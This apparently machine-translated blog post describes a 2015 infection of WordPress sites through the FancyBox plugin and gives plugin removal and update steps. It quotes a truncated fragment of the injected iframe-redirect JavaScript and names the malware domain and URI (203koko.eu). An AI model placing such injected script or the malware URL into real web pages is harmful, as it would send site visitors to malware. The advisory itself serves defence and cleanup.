[Malware iframe 203koko] Malware Infected WordPress Websites

Earlier this week a number of websites and blogs WordPress, received warnings from malware infection via Google Webmasters.

The problem to which Google Webmasters referred to is the presence of a code / script iframe malware the source websites.

if (navigator.userAgent.match(/msie/i)) { document.write(‘ ’); }

It seems that it is a vulnerability a Pluginacquis FancyBox for WordPress which until yesterday (05.02.2015) had not been updated for a long time.
Solving this problem and disinfecting viruses sites with this malware, is relatively simple.
1. Disable the FancyBox plugin.
2. Delete all FancyBox plugin files from the server (via FTP)
3. Install the new version of the plugin (Fancybox 3.0.4)

Fancybox for WordPress 3.0.4

- Renamed the setting affected by the security issue mentioned in 3.0.3. This should stop the malicious code from appearing on sites where the plugin is updated without removing the malicious code.

Fancybox for WordPress 3.0.3

Fixed a security issue.

Malware Info: 

TYPE: Iframe redirection
TARGET: Fancybox WordPress
MALWARE DOMAIN: 203koko.eu
MALWARE URI: http://203koko.eu/hjnfh/ipframe2.php
MALWARE RAW CODE:
MALWARE WRITTEN: if (navigator.userAgent.match(/msie/i)) { document.write(‘

Remove malware from your WordPress website.

[Malware iframe 203koko] Malware Infected WordPress Websites

About the author

Stealth LP

Founder and editor Stealth SettingsIn 2006 date.
Experience on Linux operating systems (especially CentOS), Mac OS X, Windows XP> Windows 10 and WordPress (CMS).

Leave a Comment